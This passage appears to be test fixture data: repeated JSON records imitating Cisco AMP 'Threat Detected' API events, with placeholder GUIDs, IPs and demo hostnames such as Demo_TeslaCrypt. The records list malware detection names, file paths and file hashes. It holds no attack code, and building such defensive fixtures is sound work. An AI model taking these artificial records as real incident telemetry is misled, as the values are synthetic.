Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228943","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":821000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261640","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261639","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261638","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":680000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261637","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":665000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261636","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":509000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261635","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259028591575000,"timestamp":1610705845,"timestamp_nanoseconds":984000000,"date":"2021-01-15T10:17:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259028591575130","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251439135752000,"timestamp":1610705841,"timestamp_nanoseconds":455000000,"date":"2021-01-15T10:17:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251439135752194","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258981346935000,"timestamp":1610705834,"timestamp_nanoseconds":346000000,"date":"2021-01-15T10:17:14+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258981346934873","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258929807327000,"timestamp":1610705822,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:02+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258929807327320","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":470000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542427","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":112000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":71000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542425","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":532000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537367","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":454000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667841684537366","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":80000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537365","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258118058508000,"timestamp":1610705633,"timestamp_nanoseconds":636000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258118058508361","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667837389570000,"timestamp":1610705633,"timestamp_nanoseconds":689000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667837389570068","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258066518901000,"timestamp":1610705621,"timestamp_nanoseconds":608000000,"date":"2021-01-15T10:13:41+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258066518900808","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258014979293000,"timestamp":1610705609,"timestamp_nanoseconds":581000000,"date":"2021-01-15T10:13:29+00:00","event_type":"Threat 